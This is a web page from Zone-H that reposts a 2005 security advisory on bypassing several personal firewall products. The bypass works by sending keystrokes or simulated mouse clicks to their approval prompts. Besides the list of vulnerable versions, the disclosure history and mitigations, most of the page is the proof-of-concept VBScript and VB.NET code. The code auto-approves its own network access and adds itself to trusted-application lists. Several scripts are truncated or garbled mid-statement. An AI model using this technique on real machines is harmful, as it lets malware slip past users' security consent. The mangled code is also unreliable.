Advertisement
Home arrow Search
Friday, 25 July 2008
  
 
Last week attacks
O.S.  Defs.  %
Linux  5378  68.98%
Win 2003  1841  23.61%
Win 2000  290  3.72%
FreeBSD  166  2.13%
MacOSX  67  0.86%
Other  54  0.69%

Total attacks: 7796 of which 2243 single ip and 5553 mass defacements

Main Menu
Home
Digital Warfare
Geopolitics
ITsec News
ITsec Advisories
Test Drive
360°
Digital Attacks Archive
Zone-H events
Publications
Zone-H Friends/Partners
Contact Us
Search
Download Area
Zone-H forum
About this website
Login Form





Lost Password?
No account yet? Register
Visitors' Map
Multiple Firewall Products Bypass Vulnerability PDF Print E-mail
User Rating: / 1
PoorBest 
Thursday, 06 January 2005
ferruh.mavituna.com/article/?769
Multiple Firewall Products Bypass Vulnerability --------------------------------- Online URL: http://ferruh.mavituna.com/article/?769 Download POC: http://ferruh.mavituna.com/opensource/firewallbypass.zip (Also I attached vbs files as txt, one of them is -mousecontrol.txt- vb.net source code) This is a generic problem of common Personal Firewall products which are accept shortcuts or provide an interface that enables to click without require a password for controlled actions (acting as server -listening ports-, executing another program, connecting to another computer etc.). ------------------------------------------------------------------- Problem; ------------------------------------------------------------------- Most of personal firewalls allow shortcuts or interface for controlling traffic. It's simple to bypass these firewalls by a multithreaded program and sending keys or by contolling mouse. This flaw enables that any Trojan or similar programs can easily bypass firewall and act as a server or access to another computer. Also most of these firewalls have a "remember" option so if you bypass firewall and successfully exploit it, firewall will never ask again. This is a similar threat with shattering attacks, but different method and impact. Vulnerable Products (Sending Key Method and Mouse Control); These products are vulnerable to both of "Sending Key Method" and "Mouse Control Method" Test Platforms; Fully Patched Windows XP Professional and Windows 2003 Enterprise Edition (May 19, 2004 - 01.01.2005) 1.ZoneAlarm / ZoneAlarm Pro (www.zonelabs.com) | Fixed I.4.5.530.000- Tested II.4.5.538.001- Tested III.5 and newer versions are not vulnerable... 2.Kerio (www.kerio.com) I.4.0.14- Tested II.All Versions 3.Agnitium Outpost Firewall (www.agnitium.com) I.2.1.303.4009 (314)- Tested II.2.5.369.4608 (369)- Tested II.All Versions 4.Kaspersky Anti-Hacker (www.kaspersky.com) I.1.5.119.0- Tested II.All Versions 5.Look 'n' Stop (www.looknstop.com) I.2.04p2- Tested II.All Versions 6.Symantec's Norton Personal Firewall (www.norton.com) I.2004- Tested II.All Versions ------------------------------------------------------------------- Vulnerable Products (Mouse Control); ------------------------------------------------------------------- These products are only vulnerable to "Mouse Control Method", because they don't accept shortcuts but still vulnerable to "Mouse Control" attacks. 1.Panda Platinum Internet Security I.8.03 (tested) II.All Versions 2.Omniquad Personal Firewall I.1.1 (tested) II.All Versions ------------------------------------------------------------------- Proof of Concept; ------------------------------------------------------------------- 2 Proof of Concepts attached to advisory (also some other POCs for some firewalls) First POC (bypassSendKey.vbs) written in VBScript (.vbs), This POC include required samples for ZoneAlarm, Kerio, Agnitium, Kaspersky Anti-Hacker, Look 'n' Stop and Symantec's Norton Personal Firewall. This script is executing an instance of itself for multithreading and send shortcuts to firewall while first instance trying to connect internet. I didn't write an auto determine firewall function (but it's so easy), so you need to set it by yourself. Second (bypassMouseControl.txt) simulates an example of bypassing Zone Alarm Firewall by with mouse control, code in VB.NET. Program is not using a real multithread because some firewalls interrupt executing of program directly. So program is executing another instance of itself with an argument. Both of them add themselves to secure app list of firewalls and then bypass active firewall. Also I attached testFirewall.vbs for testing your firewall for application control. ------------------------------------------------------------------- Solution; ------------------------------------------------------------------- All firewalls should ask password for all kind of "Allow" actions. In fact passwords can be fooled because of its nature but it is the best user friendly / secure solution for protection. As a user of these firewalls, if your firewall supports to "deny all default" option, enable it, so your firewall deny all connections by default. After that you may can manually select programs for allow them. ------------------------------------------------------------------- Final Words; ------------------------------------------------------------------- This is a methodology for bypassing interacted firewalls so it's possible that this advisory affects other firewalls in market. Also it's possible that future firewalls will be affected too. I think for now this is a serious problem for firewalls, until they imply password/random human need text method for "Allow/Deny" actions. ------------------------------------------------------------------- History; ------------------------------------------------------------------- Discovered: 03.05.2004 Vendors Informed: 28.08.2004 Published: 03.01.2005 ------------------------------------------------------------------- Vendors Status; ------------------------------------------------------------------- Special thanks to ZoneLabs Team. Ferruh Mavituna http://ferruh.mavituna.com pgpkey : http://ferruh.mavituna.com/PGPKey.asc '*********************************************************** '// By Ferruh Mavituna '// ferruh{@}mavituna.com, http://ferruh.mavituna.com '*********************************************************** '// Date : 4/25/2004 '// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading '// Related Advisory : NOT PUBLISHED YET '*********************************************************** 'Modified for Agnitium Outpost Firewall 2.1.303.4009 (314) 'Tested : Agnitium Outpost Firewall 2.5.369.4608 (369) '5/5/2004 '02.01.2005 'Ferruh Mavituna 'Const DELAY = 1000 'Const TIMES = 1 'Const EXTRADELAY = 0 '*********************************************************** Option Explicit Dim argLen, shell, sendKeyMod, i, appName Const DELAY = 1000 Const TIMES = 1 Const EXTRADELAY = 0 appName = Wscript.ScriptName 'SendKey sendkeyMod = False argLen = WScript.Arguments.Length If argLen>0 Then sendkeyMod = True Set shell = WScript.CreateObject("WScript.Shell") If sendKeyMod Then 'First Sleep for a while If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY 'Force While i0 Then sendkeyMod = True Set shell = WScript.CreateObject("WScript.Shell") If sendKeyMod Then 'First Sleep for a while If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY 'Force While i"" Then shell.sendKeys arrKeys(intFirewall,j) End If Next Wend 'Exit 'Wscript.Echo "Exit !" Wscript.Quit 1 End If 'Wscript.Echo WScript.ScriptFullName Call shell.Run(appName & " /send") 'Connect Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..." Set shell = Nothing Wscript.Quit 1 Function connect(ByVal URL) Dim web Set web = CreateObject("Microsoft.XmlHttp") web.open "HEAD", URL, FALSE web.send "" connect = web.getAllResponseHeaders Set web = Nothing End Function '*********************************************************** '// By Ferruh Mavituna '// ferruh{@}mavituna.com, http://ferruh.mavituna.com '*********************************************************** '// Date : 4/25/2004 '// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading '// Related Advisory : NOT PUBLISHED YET '*********************************************************** Option Explicit Dim argLen, shell, sendKeyMod, i Const DELAY = 10 Const TIMES = 15 'SendKey sendkeyMod = False argLen = WScript.Arguments.Length If argLen>0 Then sendkeyMod = True Set shell = WScript.CreateObject("WScript.Shell") If sendKeyMod Then While i0 Then connect = False End Function '*********************************************************** '// By Ferruh Mavituna '// ferruh{@}mavituna.com, http://ferruh.mavituna.com '*********************************************************** '// Date : 4/25/2004 '// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading '// Related Advisory : NOT PUBLISHED YET '*********************************************************** Option Explicit Dim argLen, shell, sendKeyMod, i Const DELAY = 10 Const TIMES = 15 'SendKey sendkeyMod = False argLen = WScript.Arguments.Length If argLen>0 Then sendkeyMod = True Set shell = WScript.CreateObject("WScript.Shell") If sendKeyMod Then While i 1 Then 'Sleep; Sleep(sleepTime * 1000) 'Try; setupFirewalls() If slowMotion Then Sleep(1000) 'First Access bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1)) If slowMotion Then Sleep(1000) bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3)) 'Gain Access for HTTP Sleep(300) If slowMotion Then Sleep(1000) bypassFirewall(arrFirewalls(activeFirewall, 0), arrFirewalls(activeFirewall, 1)) If slowMotion Then Sleep(1000) bypassFirewall(arrFirewalls(activeFirewall, 2), arrFirewalls(activeFirewall, 3)) 'Quit ! Me.Dispose() Else System.Diagnostics.Process.Start(flagArg, "skipme") 'Access Internet If downloadURL() Then MessageBox.Show("Successed !, Firewall ByPassed !", "Firewall ByPassed !", MessageBoxButtons.OK, MessageBoxIcon.Warning) End If Me.Dispose() End If End Sub 'Bypas POC Private Sub bypassFirewall(ByVal X As Integer, ByVal Y As Integer) 'Save Old Positions for return ! Dim oldX As Integer = Cursor.Position.X Dim oldY As Integer = Cursor.Position.Y 'Set New Position Cursor.Position = New Point(X, Y) 'Click mouse_event(MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0) mouse_event(MOUSEEVENTF_LEFTUP, 0, 0, 0, 0) 'Return Cursor.Position = New Point(oldX, oldY) End Sub 'Connect Internet Private Function downloadURL() As Boolean downloadURL = True Try Dim wc As New System.Net.WebClient() wc.DownloadFile("http://ferruh.mavituna.com", "C:\firewalltest.htm") Catch MessageBox.Show("Can not connected !", "Not Connected !", MessageBoxButtons.OK, MessageBoxIcon.Error) downloadURL = False End Try End Function '*********************************************************** '// By Ferruh Mavituna '// ferruh{@}mavituna.com, http://ferruh.mavituna.com '*********************************************************** '// Date : 4/25/2004 '// Simple POC for Bypassing multiple firewall products '*********************************************************** 'HISTORY '3/5/2004 'Added ZA '5/5/2004 'Added Kerio, Outpost '6/5/2004 'Added Kaspersky Anti-Hacker '5/9/2004 'LooknStop '5/20/2004 'Norton '*********************************************************** Option Explicit Dim arrKeys(5,5), arrDelays(5,2), arrRegistry(5,1),intFirewall Const EXTRADELAY = 0 Const DETERMINEFIREWALL = FALSE 'Auto Determine current Firewall '---------------------------------------------- 'Define Delays and Times for Firewalls '---------------------------------------------- '// Firewalls 'ZoneAlarm Pro, 4.5.530 (tested Windows 2003 & WinXP) | www.zonelabs.com Const ZoneAlarm = 0 'Kerio 4.0.14 Const Kerio = 1 'Agnitium Outpost Firewall 2.1.303.4009 (314) | www.agnitium.com Const Outpost = 2 'Kaspersky Anti-Hacker 1.5.119.0 | www.kaspersky.com Const Kaspersky = 3 'Look 'n' Stop 2.04p2 | www.looknstop.com Const LooknStop = 4 'Norton | www.norton.com Const Norton = 5 'Select Active Firewall intFirewall = ZoneAlarm '// Configuration 'Define Keys, Delays, Repeat Times for Firewalls 'Kaspersky Anti-Hacker arrDelays(Kaspersky,0) = 400 arrDelays(Kaspersky,1) = 2 arrKeys(Kaspersky,0) = "{ENTER}" 'Just say OK 'ZoneAlarm arrDelays(ZoneAlarm,0) = 10 arrDelays(ZoneAlarm,1) = 15 arrKeys(ZoneAlarm,0) = "%R" 'Select Remember arrKeys(ZoneAlarm,1) = "%Y" 'Yes 'Outpost arrDelays(Outpost,0) = 1000 arrDelays(Outpost,1) = 1 arrKeys(Outpost,0) = "+{TAB}" 'Go back once arrKeys(Outpost,1) = "{UP 2}" 'Go Up arrKeys(Outpost,1) = "{ENTER}" 'Enter 'Kerio arrDelays(Kerio,0) = 100 arrDelays(Kerio,1) = 10 arrKeys(Kerio,0) = " " ' Space - Remember, Do not ask again ! arrKeys(Kerio,1) = "%P" ' Yes 'LookNStop arrDelays(LooknStop,0) = 1000 arrDelays(LooknStop,1) = 1 arrKeys(LooknStop,0) = "(%+{TAB})" ' Authorize arrKeys(LooknStop,1) = "{LEFT}" ' Left arrKeys(LooknStop, 2) = " " ' Space 'Norton arrDelays(Norton,0) = 100 arrDelays(Norton,1) = 5 arrKeys(Norton,0) = "%A" ' Allow arrKeys(Norton,1) = "%O" ' OK If DETERMINEFIREWALL Then 'TODO:Read Registries and determine it ! End If Dim argLen, shell, sendKeyMod, i, j, appName appName = Wscript.ScriptName 'SendKey sendkeyMod = False argLen = WScript.Arguments.Length If argLen>0 Then sendkeyMod = True Set shell = WScript.CreateObject("WScript.Shell") If sendKeyMod Then 'First Sleep for a while If EXTRADELAY>0 Then WScript.Sleep EXTRADELAY 'Force While i"" Then shell.sendKeys arrKeys(intFirewall,j) End If Next Wend 'Exit 'Wscript.Echo "Exit !" Wscript.Quit 1 End If 'Wscript.Echo WScript.ScriptFullName Call shell.Run(appName & " /send") 'Connect Wscript.Echo connect("http://ferruh.mavituna.com") & "Mission Accomplished..." Set shell = Nothing Wscript.Quit 1 Function connect(ByVal URL) Dim web Set web = CreateObject("Microsoft.XmlHttp") web.open "HEAD", URL, FALSE web.send "" connect = web.getAllResponseHeaders Set web = Nothing End Function '*********************************************************** '// By Ferruh Mavituna '// ferruh{@}mavituna.com, http://ferruh.mavituna.com '*********************************************************** '// Date : 4/25/2004 '// Simple POC for Skipping Zone Alarm Firewall with sendKeys and multithreading '// Related Advisory : NOT PUBLISHED YET '*********************************************************** 'Modified for Kerio 4.0.14 '5/5/2004 'Ferruh Mavituna 'Const DELAY = 100 'Const TIMES = 10 '*********************************************************** Option Explicit Dim argLen, shell, sendKeyMod, i, appName Const DELAY = 100 Const TIMES = 10 appName = Wscript.ScriptName 'SendKey sendkeyMod = False argLen = WScript.Arguments.Length If argLen>0 Then sendkeyMod = True Set shell = WScript.CreateObject("WScript.Shell") If sendKeyMod Then While i


Comments Index (Total Messages: 0)


Post Reply
Name:Guest
Title:
Comment:



Enter this security word

Powered by a Zone-H(ified) version of AkoComment 3.0!


DISCLAIMER: Forum postings are the opinion of the posting author alone, and should not be taken as the opinion of Zone-h. The   author is entirely and solely responsible for all content that he/she uploads, posts, or otherwise transmits via the website. Zone-h is not responsible for such content. However, Zone-h shall have the right, but not the obligation, to delete, move, or edit any content that violates this agreement or is otherwise objectionable as determined by Zone-h in its sole discretion and without notice.
 
< Prev   Next >
[ Back ]
Advertisement
 
Top!
© 2008 Zone-H.org
Joomla! is Free Software released under the GNU/GPL License.
 Top!